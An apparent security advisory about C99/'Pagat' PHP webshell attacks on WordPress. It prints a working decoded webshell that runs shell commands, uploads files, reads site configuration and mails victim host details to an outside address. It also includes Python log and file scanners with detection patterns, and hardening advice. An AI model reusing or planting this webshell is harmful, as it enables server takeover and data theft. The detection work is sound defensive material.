WordPress C99 PHP webshell attacks intensify: Anheng APT early-warning platform webshell audit alarms
Recently IBM's Managed Security Services (MSS) team issued a warning: it has observed a large number of WordPress sites being attacked with the C99 PHP webshell, and it reminds WordPress site administrators to promptly scan for and fix site vulnerabilities.
According to the IBM MSS team's long-term monitoring and analysis of malicious events, security researchers found that over the past two months a class of C99 webshells has been causing traffic anomalies: 404 such events were recorded in February and 588 in March, as follows:
For more details see:
https://securityintelligence.com/got-wordpress-php-c99-webshell-attacks-increasing/
The Anheng Institute collected C99 webshell samples via Google search; after decoding, one sample reads as follows:
<?php
error_reporting(0);

// First visit: e-mail the operator the victim host, request URI, safe_mode state and IPs;
// later visits only bump a counter ($_SESSION is used without session_start(), so this
// branch runs on every request unless sessions auto-start)
if (!isset($_SESSION['bajak'])) {
    $visitcount = 0;
    $web = $_SERVER['HTTP_HOST'];
    $inj = $_SERVER['REQUEST_URI'];
    $body = "Ada yang inject \n{$web}{$inj}";
    $safem0de = @ini_get('safe_mode');
    if (!$safem0de) {
        $security = 'safe_mode = OFF';
    } else {
        $security = 'safe_mode = ON';
    }
    $serper = gethostbyname($_SERVER['SERVER_ADDR']);
    $injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
    mail('cumicd@gmail.com', "{$body}", "Hasil Bajakan http://{$web}{$inj}\n{$security}\nIP Server = {$serper}\nIP injector = {$injektor}");
    $_SESSION['bajak'] = 0;
} else {
    $_SESSION['bajak']++;
}

// ?Clone moves the shell itself to a fixed drop path under the document root
if (isset($_GET['Clone'])) {
    $source = $_SERVER['SCRIPT_FILENAME'];
    $desti = $_SERVER['DOCUMENT_ROOT'] . '/images/stories/food/footer.php';
    rename($source, $desti);
}

// Banner: safe_mode state, effective uid/gid and kernel version
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {
    $security = 'safe_mode:off';
} else {
    $security = 'safe_mode:on';
}
echo "Pagat-shell\n";
echo $security . "\n";
$cur_user = '(' . get_current_user() . ')';
echo 'user:uid=' . getmyuid() . $cur_user . ' gid=' . getmygid() . $cur_user . "\n";
echo 'uname: ' . php_uname() . "\n";

// Current working directory with a trailing separator (slash or backslash)
function pwd()
{
    $cwd = getcwd();
    if ($u = strrpos($cwd, '/')) {
        if ($u != strlen($cwd) - 1) {
            return $cwd . '/';
        } else {
            return $cwd;
        }
    } elseif ($u = strrpos($cwd, '\\')) {
        if ($u != strlen($cwd) - 1) {
            return $cwd . '\\';
        } else {
            return $cwd;
        }
    }
}

echo '';  // upload and command form markup (HTML not preserved on the page)
echo '';

// File upload into the current directory, optionally under a new name
if (isset($_POST['submit'])) {
    $uploaddir = pwd();
    if (!($name = $_POST['newname'])) {
        $name = $_FILES['userfile']['name'];
    }
    move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name);
    if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name)) {
        echo 'Upload gagal!!!';
    } else {
        echo 'Upload Success to ' . $uploaddir . $name . ': \p';
    }
}

// Command execution via POST or GET, configuration file read via ?RF,
// and a directory listing when no parameter is given
if (isset($_POST['command'])) {
    $cmd = $_POST['cmd'];
    echo "\n" . shell_exec($cmd) . "\n";
} elseif (isset($_GET['cmd'])) {
    $comd = $_GET['cmd'];
    echo "\n" . shell_exec($comd) . "\n";
} elseif (isset($_GET['RF'])) {
    $rf = file_get_contents('../../configuration.php');
    echo $rf;
} else {
    echo "\n" . shell_exec('ls -la') . "\n";
}
?>
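The sample reads a small, fixed set of request parameters (cmd, command, RF, Clone), drops itself under /images/stories/, and in WordPress compromises typically lives in the uploads tree. Those traits can be turned into web-log detections. The following is an added example, not code from the original page or from IBM/Anheng: the log lines are constructed, and the rules and the SUSPICIOUS_PHP_DIRS list are this example's own assumptions drawn from the sample.

```python
"""Flag web-server log entries whose request shape matches the shell sample above.
Added example (not from the original page); the log lines are constructed and the
rules are this example's own assumptions drawn from the sample's parameters."""
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx combined log format: client ident user [time] "METHOD URL PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Parameters the sample reads: $_GET['cmd'], $_GET['RF'], $_GET['Clone'], $_POST['command']
SHELL_PARAMS = {"cmd", "RF", "Clone", "command"}

# PHP should never be served from the WordPress uploads tree, and /images/stories/ is the
# directory the sample renames itself into (footer.php) when ?Clone is requested.
SUSPICIOUS_PHP_DIRS = ("/wp-content/uploads/", "/images/stories/")

# Constructed sample log lines (not real traffic); the client IPs are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Apr/2016:10:01:02 +0000] "GET /wp-content/uploads/2016/04/footer.php?cmd=ls%20-la HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Apr/2016:10:01:09 +0000] "GET /images/stories/food/footer.php?RF HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [12/Apr/2016:10:02:30 +0000] "POST /wp-content/uploads/2016/04/footer.php HTTP/1.1" 200 77 "-" "curl/7.47.0"',
    '198.51.100.7 - - [12/Apr/2016:10:03:00 +0000] "GET /wp-content/uploads/2016/04/cat.jpg HTTP/1.1" 200 40960 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Apr/2016:10:03:01 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 33 "-" "Mozilla/5.0"',
]

def classify(line):
    """Return a finding dict for a suspicious request, or None for a benign one."""
    m = LOG_RE.match(line)
    if not m:
        return None  # unparseable line; a real pipeline would count these separately
    parts = urlsplit(m.group("url"))
    path = parts.path
    is_php = path.lower().endswith(".php")
    params = set(parse_qs(parts.query, keep_blank_values=True))  # ?RF carries no value
    reasons = []
    if is_php and path.startswith(SUSPICIOUS_PHP_DIRS):
        reasons.append("php-under-upload-dir")
    hits = params & SHELL_PARAMS
    if is_php and hits:
        reasons.append("shell-param:" + ",".join(sorted(hits)))
    if m.group("method") == "POST" and is_php and path.startswith(SUSPICIOUS_PHP_DIRS):
        reasons.append("post-to-uploaded-php")
    if not reasons:
        return None
    return {"ip": m.group("ip"), "method": m.group("method"), "path": path, "reasons": reasons}

def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f is not None]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The parameter rule on its own will fire on legitimate applications that also use a `cmd` parameter, so in practice it is the combination with a PHP file in a directory that should only hold static uploads that carries the weight; the POST rule catches operators who send the command in the request body and leave nothing in the query string.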
Further analysis of compromised WordPress sites, found via a Google search for "pagat shell":
https://www.google.com.hk/?gws_rd=ssl#safe=strict&q=pagat+shell
A webshell lets an attacker run terminal commands on the server or upload new files to the site, and those new files may be more intrusive webshells, DDoS clients, Bitcoin-mining software, or other malware.
According to the IBM MSS team, as of April 12, 2016, a simple Google search query alone found about 32,000 WordPress sites hosting the Pagat.txt file.
The APT early-warning platform detects webshell attacks in real time and raises alarms; the C99 webshell cannot evade the platform's rules and is alerted on accurately, helping detect webshell attacks at the earliest moment.
Security recommendations:
Given the current situation, site administrators are advised to do the following:
1. Edit the php.ini file to disable the Base64 decoding function: locate the configuration directive "disable_functions =" and set it to "disable_functions = eval,base64_decode,gzinflate";
2. Rename the upload folder. WordPress lets the upload routine write files into the upload folder; if the default name is kept, an attacker can easily guess the exact path of an uploaded file, so renaming it greatly reduces the chance that an attacker gets a PHP file containing a shell script uploaded;
3. Install a robust security plugin, such as the Wordfence WordPress plugin;
4. Conduct a security scan. We recommend using open-source scanning tools to run a full scan of uploaded files; ModSecurity can be used for this, while AWVS or a WordPress security scanner can scan the site to detect vulnerabilities promptly, then repair and harden them;
5. If the site is found to be infected, promptly change the passwords of all administrative accounts and notify site users to change their passwords.
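Recommendation 4 asks for a full scan of uploaded files. The following is an added example, not code from the page or from any of the scanners it names, of what such a scan looks for: PHP files where WordPress only stores static uploads, command-execution functions combined with request input, a decoder feeding eval(), and move_uploaded_file(). The indicator patterns, the directory rule and the sample files are this example's own assumptions modelled on the shell sample above.

```python
"""Walk a WordPress tree and flag PHP files that look like dropped webshells.
Added example (not from the page): the indicator patterns, directory rule and the
sample files are this example's own assumptions, modelled on the shell sample above."""
import os
import re
import tempfile

PHP_EXTS = (".php", ".phtml", ".php5", ".phar")

# Command-execution sinks; the lookbehind skips method calls such as $pdo->exec(
EXEC_FUNCS = re.compile(r"(?<![\w>$])(shell_exec|system|passthru|exec|popen|proc_open)\s*\(")
USER_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\[")
# eval() fed straight from a decoder: the classic packed-shell pattern
OBFUSCATED_EVAL = re.compile(r"\beval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(")
UPLOADER = re.compile(r"\bmove_uploaded_file\s*\(")

def inspect_file(rel_path, content):
    """Return the list of indicator names that fire for one PHP file."""
    reasons = []
    if "/uploads/" in rel_path:
        reasons.append("php-in-uploads-dir")  # WordPress never needs PHP under wp-content/uploads
    if EXEC_FUNCS.search(content) and USER_INPUT.search(content):
        reasons.append("exec-with-user-input")
    if OBFUSCATED_EVAL.search(content):
        reasons.append("obfuscated-eval")
    if UPLOADER.search(content):
        reasons.append("file-uploader")
    return reasons

def scan_tree(root):
    """Scan every PHP file under root; return sorted (relative path, reasons) pairs."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXTS):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, encoding="utf-8", errors="replace") as fh:
                content = fh.read()
            reasons = inspect_file(rel, content)
            if reasons:
                findings.append((rel, reasons))
    return sorted(findings)

# Constructed sample tree: one dropped shell, one backdoored theme file, one clean plugin, one image.
SAMPLE_FILES = {
    "wp-content/uploads/2016/04/footer.php": (
        "<?php\n"
        "if (isset($_POST['cmd'])) { $cmd = $_POST['cmd']; echo shell_exec($cmd); }\n"
        "if (isset($_POST['submit'])) { move_uploaded_file($_FILES['userfile']['tmp_name'], getcwd() . '/' . $_POST['newname']); }\n"
    ),
    "wp-content/themes/example/functions.php": "<?php\neval(base64_decode('ZWNobyAxOw=='));\n",
    "wp-content/plugins/clean/clean.php": "<?php\nfunction clean_plugin_version() { return '1.0'; }\n",
    "wp-content/uploads/2016/04/photo.jpg": "not really a jpeg\n",
}

def build_sample_tree(root):
    """Write the constructed sample files under root."""
    for rel, content in SAMPLE_FILES.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)

def run_demo():
    """Build the sample tree in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_tree(root)

if __name__ == "__main__":
    for rel, reasons in run_demo():
        print(rel, reasons)
```

Content scanning complements recommendation 1 rather than duplicating it: eval is a PHP language construct, not a function, so the disable_functions directive cannot switch it off, whereas base64_decode and gzinflate can be disabled and the eval(base64_decode(...)) pattern is caught here whatever php.ini says. Run the scanner against a copy of the site, or against the live tree read-only, and review each finding by hand, since a legitimate plugin that legitimately calls exec() with request input will also fire the exec-with-user-input rule.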
Security researcher: Zise